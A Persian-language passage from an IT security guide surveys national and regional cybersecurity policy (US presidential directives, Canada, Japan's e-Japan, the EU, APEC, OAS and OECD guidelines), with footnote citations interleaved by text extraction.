ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﺸﻜﻼﺕ ﺑـﻪ ﻏﻴﺮﻗﺎﺑـﻞ ﺍﻧﺘـﺸﺎﺭ ﺷـﺪﻥ ﻣﻨـﺎﺑﻊ
ﺣﻴﺎﺗﻲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣـﻲﺍﻧﺠﺎﻣـﺪ ،ﻧﻘـﺶ ﺩﻭﻟـﺖ ﺩﺭ
٢٨
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﻩ ﺭﻓﻊ ﻣﺸﻜﻼﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ".
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﺮﺩﻩﺍﻧﺪ ٢٩.ﺩﺭ ﺣﻘﻴﻘـﺖ ﺍﻣﻨﻴـﺖ ﻳـﻚ ﺟـﺰﺀ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﻭ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺻـﻮﻝ ﺣﻘـﻮﻗﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴـﻪ ﭘـﻴﺶﻧـﻮﻳﺲ ﺑﺮﻧﺎﻣـﺔ ﻣﻠـﻲ ﺗﻮﺳـﻌﻪ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﮊﺍﭘـﻦ ﺩﺭ
ﻣــﺎﺭﺱ ۲۰۰۱ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣــﺔ ﺍﻭﻟﻮﻳــﺖﺑﻨــﺪﻱ
٣٠
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺧﻮﺩ ﻣﻮﺳﻮﻡ ﺑﻪ e-Japanﺗﺮﻛﻴﺐ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٣٨
ﻧﺪﺍﺭﺩ ٣٢.ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌـﻪ ﺭﻭﻱ ﺍﻳـﻦ
ﻣﻮﺿــﻮﻉ ﺩﺭ ﺳــﺎﻝ ۱۹۹۶ﻫﻴــﺄﺗﻲ ﺑــﻪ ﻧــﺎﻡ ﻣﺠﻤــﻊ ﺣﻤﺎﻳــﺖ ﺍﺯ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ٣٣ﻣﺘـﺸﻜﻞ ﺍﺯ ﺑﻌـﻀﻲ
ﻣﻘﺎﻣﺎﺕ ﺣﻘﻴﻘﻲ ﻭ ﺣﻘﻮﻗﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ .ﺍﻳﻦ ﻣﺠﻤﻊ ﻓﺎﻗﺪ ﻫﺮﮔﻮﻧﻪ
ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﻮﺩ ﻭ ﺳﺎﺧﺘﺎﺭ ﭘﺎﻳﺪﺍﺭ ﻭ ﺛﺎﺑﺘﻲ ﻧﺪﺍﺷـﺖ ،ﺑﻠﻜـﻪ
ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﮔــﺰﺍﺭﺵ ،ﻣـﺼﺎﺣﺒﻪ ﻭ ﺗﺤﻘﻴــﻖ ﻓـﺮﺍﻫﻢ ﻛــﺮﺩ ﻭ
ﮔﺰﺍﺭﺷﻲ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛﻪ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ،ﻣﻘﺎﻣـﺎﺕ
ﺣﻘﻮﻗﻲ ،ﺭﺳﺎﻧﻪﻫﺎﻱ ﺟﻤﻌﻲ ﻭ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ .ﺍﻳـﻦ ﻫﻴـﺄﺕ
ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﺭ ﺍﻛﺘﺒـﺮ ۱۹۹۷ﺍﺭﺍﺋـﻪ ﺩﺍﺩ ﻭ
ﺧﻮﺍﺳﺘﺎﺭ ﻫﻤﻜﺎﺭﻱ ﺻﻤﻴﻤﺎﻧﻪﺗﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﺷﺪ.
ﻓﺎﺯ ﺩﻭﻡ ،ﺍﻳﺠـﺎﺩ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺛﺎﺑـﺖ ﺩﺭ ﺑﺨـﺶ ﺍﺟﺮﺍﻳـﻲ ﺑـﺮﺍﻱ
ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ
ﻛﺎﻧﺎﺩﺍ ﺑﺪﻧﺒﺎﻝ ﺍﻧﺘﺸﺎﺭ ﻧﺘﺎﻳﺞ ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺗﻮﺳـﻂ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ،٣٤ﺩﻭﻟﺖ ﻳﻚ ﻣﺮﻛـﺰ ﻫﻤﻜـﺎﺭﻱ
ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺣﻔﺎﻇﺖ ﺍﻃﻼﻋـﺎﺕ ،ﺍﺭﺯﻳـﺎﺑﻲ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﺑﺮﺭﺳـﻲ
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺩﻓﺘﺮ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺣﻴﺎﺗﻲ ﻭ ﺁﻣﺎﺩﮔﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩﺁﻭﺭﺩﻥ ﻳـﻚ
٣٥
ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﺗﺄﺳﻴﺲ ﻛﺮﺩ.
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ،ﻛﻠﻴﻨﺘـﻮﻥ ﻭ ﺑـﻮﺵ ﺑـﺎ ﺗﺄﺳـﻴﺲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ،ﭼﻨـﺪ ﮔـﺎﻡ ﻋﻤﻠـﻲ ﺑﺮﺩﺍﺷـﺘﻨﺪ .ﺩﺭ
ﻃﺮﺣﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺗﻬﻴﻪ ﺷﻮﺩ ٣٦.ﺍﻳﻦ ﺩﺳـﺘﻮﺭﺍﺕ ﺭﺋـﻴﺲﺟﻤﻬـﻮﺭ ،ﺑـﻪ
۳۲
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﻣﻌﺮﻓـﻲ ﺷـﺪﻩ ﺩﺭ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ۱۷
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
President's Critical Infrastructure Protection
Board
Critical Infrastructure Protection Task Force
& Office of Critical Infrastructure Protection
]Emergency Prepareness [Canada
http://www.ocipep.gc.ca/critical/nciap/disc_e.a
sp
۳۶
ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘــﻲ ﻣﺠــﻮﺯ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ
ﺧﺼﻮﺻﻲ ﺭﺍ ﻧﻤﻲ ﺩﺍﺩ ،ﺍﻣﺎ ﺩﺭ ﻋﻮﺽ ﺑﺮ ﺿﺮﻭﺭﺕ ﻭﺟﻮﺩ ﻫﻤﻜﺎﺭﻱ
ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺗﺄﻛﻴـﺪ
ﺩﺍﺷﺖ .ﺳـﺎﻳﺮ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺭﻫﺒـﺮﻱ ﺩﺭ ﻗـﺴﻤﺖ "ﻓﺮﻣﺎﻧـﺪﻫﻲ ﻭ
ﺳﺎﺯﻣﺎﻥ" ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﻓﺎﺯ ﺳﻮﻡ ﺷﺎﻣﻞ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺍﺳـﺖ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺩﺭ ﺑـﺎﻻ
ﺍﺷﺎﺭﻩ ﺷﺪ ،ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳـﻨﺪ
ﻣﺠﺰﺍ ﻭ ﻳـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ ICTﺑﺎﺷـﺪ .ﻧﻜﺘـﺔ
ﻛﻠﻴﺪﻱ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﺍﺳﺖ .ﺩﺭ ﮊﺍﭘﻦ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻛﻠـﻲ ICT
ﺍﺩﻏﺎﻡ ﻛـﺮﺩﻩ ،ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ "ﻣﺮﻛـﺰ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ" ﺩﺭ ﻛﺎﺑﻴﻨـﻪ ﻭ "ﺷـﻮﺭﺍﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ" ﻛﻪ ﺍﺯ ﺑﻴﺴﺖ ﺻﺎﺣﺒﻨﻈﺮ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺑـﻮﺩ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﺭﺳﻴﺪ ،ﻭ ﺍﺻﺎﻟﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺗﺄﺳﻴﺲ ﺷﺪ ﻛﻪ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺩﻭﻟﺖ
٣٧
ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺗﺮﻛﻴﺐ ﻛﻨﺪ.
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻳﻚ ﺳﻨﺪ ﻣﺠﺰﺍ ﺍﺳـﺖ ﻭ
ﺗﻬﻴﺔ ﺁﻥ ﻣﺤﺼﻮﻝ ﻓﺮﺁﻳﻨﺪﻱ ﻃﻮﻻﻧﻲ ﺍﺯ ﺗﺒﺎﺩﻝﻧﻈﺮﻫﺎﻱ ﻋﻤـﻮﻣﻲ
ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﻣـﺪﻳﺮﻳﺖ ﺷـﺪﻩ
ﺍﺳﺖ .ﻧﮕﺎﺭﺵ ﺍﻭﻝ ﺍﺳﻨﺎﺩ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﻣﻨﺘـﺸﺮ
ﺷﺪ ،ﻧﺴﺨﻪ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪﺓ ﺁﻥ ﺩﺭ ﭘـﺎﺋﻴﺰ ﺳـﺎﻝ ،۲۰۰۲ﻭ ﻧﮕـﺎﺭﺵ
ﺁﺧﺮ ﺁﻥ ﺩﺭ ﻓﻮﺭﻳﺔ ٣٨.۲۰۰۳ﺩﺭ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ ﻃﺮﺣﻬـﺎﻱ
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺎﻭﺭﻩﻫﺎﻱ ﺗﻔﺼﻴﻠﻲ ﺩﺭ ﺩﻭﻟﺖ ﻭ ﻣﻴﺎﻥ
ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪ .ﺩﻩ ﻧﺸﺴﺖ ﻋﻤـﻮﻣﻲ ﻧﻴـﺰ
ﺩﺭ ﺷﻬﺮﻫﺎﻱ ﻣﻬﻢ ﺟﻬﺎﻥ ﺑﻤﻨﻈـﻮﺭ ﺟﻤـﻊﺁﻭﺭﻱ ﻧﻴﺮﻭﻫـﺎﻱ ﻣـﻮﺭﺩ
33
Council, October 8, 2001,
http://fas.org/irp/offdocs/eo/eo-13228.htm
E.O. 13231, Critical Infrastructure Protection
in the Information Age, October 16, 2001,
http://ciao.gov/News/EOonCriticalInfrastructur
eProtection101601.html
e-Japan Security Policy Program, March 29,
2001,
http://www.kantei.go.jp/foreign/it/network/priori
ty-all/index.html
34
35
ﻛﻠﻴﻨﺘﻮﻥ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ "ﺗﺼﻤﻴﻤﺎﺕ ﺭﺍﻫﺒـﺮﺩﻱ ﺭﺋـﻴﺲ ﺟﻤﻬـﻮﺭ" ) (PDDﻣﻨﺘـﺸﺮ
ﻛﺮﺩ:
63: Critical Infrastructure Protection, May 22,
1998,
http://www.fas.org/irp/offdocs/pdd-63.htm
62: Protection Against Unconventional
Threats to the Homeland & Americans
Overseas, May 22, 1998,
http://www.fas.org/irp/offdocs/pdd-62.htm
ﺑﻌﺪ ﺍﺯ ۱۱ﺳﭙﺘﺎﻣﺒﺮ ۲۰۰۱ﻧﻴﺰ ﺑﻮﺵ ﺩﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺍﺟﺮﺍﻳﻲ ﺍﻣﻀﺎ ﻛﺮﺩ
ﻛﻪ ﻃﺒﻖ ﺁﻧﻬـﺎ ﻋﻤﻠﻴـﺎﺕ ﻣﺠـﺪﺩﹰﺍ ﻣﻜﺎﻧﻴـﺎﺑﻲ ﻣـﻲﺷـﺪ ﻭ ﻣﻮﺟﻮﺩﻳﺘﻬـﺎﻱ
ﺟﺪﻳﺪﻱ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ
ﺑﻮﺟﻮﺩ ﻣﻲﺁﻣﺪ:
E.O. 13228, Establishing the Office of
Homeland Security & the Homeland Security
۳۹
ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪ ﺁﻥ ﻋﺒﺎﺭﺗﺴﺖ ﺍﺯ
The National Strategy to Secure Cyberspace:
http://www.dhs.gov/interweb/assetlibrary/Natio
nal_Cyberspace_Strategy.pdf.
ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺎ ﻛﻤﻚ ﺍﺯ ﺳﻨﺪ ﺯﻳﺮ ﺗﻬﻴﻪ ﺷﺪ:
The National Strategy for Physical Protection
of Critical Infrastructures & Key Assets:
http://www.dhs.gov/interweb/assetlibrary/Phys
ical-Strategy.pdf.
ﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺍﺟﺰﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺭﺍ ﺷﺮﺡ ﻣـﻲﺩﻫﻨـﺪ ﻭ
ﺩﺭ ﺟﻮﻻﻱ ۲۰۰۲ﺗﻮﺳﻂ ﻛﺎﺥ ﺳﻔﻴﺪ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ.
37
٢٣٩
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺑﺮﭘﺎ ﮔﺸﺖ .ﺩﺭ ﺍﻳﻦ ﻧﺸـﺴﺘﻬﺎ
ﮔﺮﻭﻩ ﻫﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ -ﻣﺪﻧﻲ ،ﻫﻤﻜﺎﺭﺍﻥ ﺗﺠﺎﺭﻱ ،ﻭ ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ
ﻳﻜﺪﻳﮕﺮ ﻣﺸﻮﺭﺕ ﻛﺮﺩﻧﺪ .ﺍﺯ ﺩﻳﮕﺮ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
٣٩
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﺩﺭ ﺳﻄﺢ ﻣﻨﻄﻘﻪﺍﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺍﻳﻦ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎ ﻓﻌﺎﻟﻴﺘﻬـﺎﻳﻲ
ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺧﻮﺩ
ﺭﺍ ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻳﻚ ﺳﻨﺪ ﻭﺍﺣﺪ ،ﺑﻠﻜﻪ ﻃﻲ ﭼﻨـﺪﻳﻦ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ
ﺳﻠﺴﻠﻪ ﺍﺳﻨﺎﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺣﻬﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ
٤١
٤٠
ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ .ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺁﺳـﻴﺎ)(APEC
ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ ﻛـﺎﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ ﺩﻭﺭ ) ٤٢(TELﻭ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﻓﻌـﺎﻝ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ٤٣.ﺳﺎﺯﻣﺎﻥ
ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜﺎ ) ٤٤(OASﻣﺴﺌﻮﻟﻴﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﺭﺍ ﻧﻴﺰ
ﺑــﺮ ﻋﻬــﺪﻩ ﺩﺍﺭﺩ ٤٥.ﺩﺭ ﮊﻭﺋــﻦ ۲۰۰۳ﻣﺠﻤــﻊ ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ
ﺍﻳﺎﻟﺘﻬﺎﻱ ﺁﻣﺮﻳﻜـﺎ ﻗﻄﻌﻨﺎﻣـﻪﺍﻱ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺩﺍﺧﻠـﻲ
ﺑﻌﺪ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ،ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻣﻮﺿـﻮﻋﻲ ﻫﻤﺎﻫﻨـﮓ ﻭ
ﻳﻜﭙﺎﺭﭼــﻪ ﺍﺯ ﺍﺳــﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺩﺭ ﺳــﻄﻮﺡ ﻣﻠــﻲ،
ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺳﺖ:
•
ﻣﺸﺎﺭﻛﺖ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ
ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﺑﺨـﺸﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ
ﺧﺼﻮﺻﻲ ﺍﺳﺖ ٤٩.ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺻـﻠﻲ
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ
ﻋﻬﺪﻩ ﺩﺍﺭﺩ.
•
ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ
"ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪﮔﺎﻥ ﺍﺯ ﺷــﺒﻜﻪ ﺍﺯ ﺟﻤﻠــﻪ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﮔﺎﻥ،
ﺭﺍﻫﺒﺮﺍﻥ ،ﺍﭘﺮﺍﺗﻮﺭﻫﺎ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ
ﺗﻬﺪﻳﺪﺍﺕ ﻭﺍﺭﺩﻩ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻭ
39
40
۴۳
41
42
ﺍﻳﻦ ﺳﻨﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﭘﻴﺪﺍ ﻛﻨﻴﺪ:
http://www.apecsec.org.sg/content/apec/apec
_groups/working_groups/telecommunications
_and_information.html
ﺩﺭ ﺍﻛﺘﺒــﺮ ،۲۰۰۲ﻭﺯﻳــﺮﺍﻥ APECﺍﻫﻤﻴــﺖ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻳﻜﭙــﺎﺭﭼﮕﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ APECﺭﺍ ﺩﺭ ﻋـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻨﺪ .ﺩﺭ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ،ﺁﻧـﺎﻥ ﺍﺯ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ TELﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ ﻭ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺳـﺘﻮﺭ
ﺩﺍﺩﻧﺪ ﻛﻪ ﺁﻧﺮﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ:
۴۵
http://203.127.220.67/apec/ministerial_statem
ents/annual_ministerial/2002_14th_apec_mini
sterial.html#policies
44 Organization of American States
ﻭﻇﻴﻔﻪ ﺍﻭﻟﻴﻪ OASﺟﻨﺎﻳﺎﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻮﺩ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.oas.org/juridico/english/cyber_exp
erts.htm
Organization for Eonomic Cooperation and
Development
& Organization for Economic Cooperation
Development, OECD Guidelines for the
Security of Information Systems & Networks:
Towards a Culture of Security, July 25, 2002,
http://www.oecd.org/pdf/M00034000/M000340
00.pdf
Implementation Plans for the OECD
Guidelines for the Security of Information
Systems & Networks: Towards a Culture of
Security, Organization for Economic
Cooperation & Development, Working Party
on Information Security & Privacy,
DSTI/ICCP/REG(2002)6
/FINAL, Jan. 21, 2003,
http://www.olis.oecd.org/olis/2002doc.nsf/Link
To/dsti-iccp-reg(2002)6-final
